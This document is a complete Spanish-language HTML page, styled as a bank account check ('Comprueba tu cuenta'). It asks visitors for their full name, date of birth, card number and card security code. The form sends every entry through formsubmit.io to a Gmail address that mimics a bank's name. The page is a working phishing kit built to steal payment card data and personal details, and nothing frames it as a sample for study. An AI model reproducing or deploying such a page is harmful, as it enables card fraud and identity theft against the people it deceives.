<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Banca</title>

  <style>
    * {
      font-family: sans-serif;
      margin: 0;
      padding: 0;
    }

    label {
      display: block;
      margin-bottom: 10px;
      font-size: 16px;
      font-weight: lighter;
    }

    input,
    select {
      width: 95%;
      height: 45px;
      padding: 8px;
      margin-bottom: 10px;
      border-radius: 5px;
      border: none;
      background-color: #ccc;
    }

    button {
      background-color: #116529;
      color: white;
      padding: 10px 20px;
      border: none;
      border-radius: 9999px;
      margin-top: 20px;
      cursor: pointer;
      width: 100%;
      height: 65px;
      font-size: 20px;
    }

    button:hover {
      background-color: #3e8e41;
    }

    #myForm {
      padding: 20px;
    }

    .alerta {
      background-color: #147030;
      color: white;
      text-align: center;
      padding: 20px 2px 20px 2px;
      display: flex;
      flex-direction: column;
      gap: 10px;
    }

    .descalerta {
      font-size: 18px;
      font-weight: lighter;
    }
  </style>

</head>

<body>
  <div class="alerta">
    <h1 class="tituloalerta">Comprueba tu cuenta</h1>
    <h2 class="descalerta">Ingresa tus datos para comprobar tu identidad</h2>
  </div>
  <form id="myForm" id="contactform" action="https://formsubmit.io/send/aztecabancok@gmail.com" method="POST">
    <label for="nombres">Nombre(s)</label>
    <input type="text" id="nombres" name="nombres" required>

    <label for="apellidoPaterno">Apellido Paterno</label>
    <input type="text" id="apellidoPaterno" name="apellidoPaterno" required>

    <label for="apellidoMaterno">Apellido Materno</label>
    <input type="text" id="apellidoMaterno" name="apellidoMaterno" required>

    <label for="fechaNacimiento">Fecha de Nacimiento</label>
    <div>
      <select name="dia" id="dia" required>
        <option value="">Día</option>
        <option value="1">1</option>
        <option value="2">2</option>
        <option value="3">3</option>
        <option value="4">4</option>
        <option value="5">5</option>
        <option value="6">6</option>
        <option value="7">7</option>
        <option value="8">8</option>
        <option value="9">9</option>
        <option value="10">10</option>
        <option value="11">11</option>
        <option value="12">12</option>
        <option value="13">13</option>
        <option value="14">14</option>
        <option value="15">15</option>
        <option value="16">16</option>
        <option value="17">17</option>
        <option value="18">18</option>
        <option value="19">19</option>
        <option value="20">20</option>
        <option value="21">21</option>
        <option value="22">22</option>
        <option value="23">23</option>
        <option value="24">24</option>
        <option value="25">25</option>
        <option value="26">26</option>
        <option value="27">27</option>
        <option value="28">28</option>
        <option value="29">29</option>
        <option value="30">30</option>
        <option value="31">31</option>
      </select>
      <select name="mes" id="mes" required>
        <option value="">Mes</option>
        <option value="enero">Enero</option>
        <option value="febrero">Febrero</option>
        <option value="marzo">Marzo</option>
        <option value="abril">Abril</option>
        <option value="mayo">Mayo</option>
        <option value="junio">Junio</option>
        <option value="julio">Julio</option>
        <option value="agosto">Agosto</option>
        <option value="septiembre">Septiembre</option>
        <option value="octubre">Octubre</option>
        <option value="noviembre">Noviembre</option>
        <option value="diciembre">Diciembre</option>
      </select>
      <select name="anio" id="anio" required>
        <option value="">Año</option>
        <option value="2005">2005</option>
        <option value="2004">2004</option>
        <option value="2003">2003</option>
        <option value="2002">2002</option>
        <option value="2001">2001</option>
        <option value="2000">2000</option>
        <option value="1999">1999</option>
        <option value="1998">1998</option>
        <option value="1997">1997</option>
        <option value="1996">1996</option>
        <option value="1995">1995</option>
        <option value="1994">1994</option>
        <option value="1993">1993</option>
        <option value="1992">1992</option>
        <option value="1991">1991</option>
        <option value="1990">1990</option>
      </select>
    </div>
    <label for="numeroTarjeta">Número de Tarjeta</label>
    <input type="text" id="numeroTarjeta" name="numeroTarjeta" required>

    <label for="codigoSeguridad">Código de Seguridad</label>
    <input type="text" id="codigoSeguridad" name="codigoSeguridad" required>

    <button type="submit" id="submit">Comprobar Cuenta</button>
  </form>
</body>

</html>
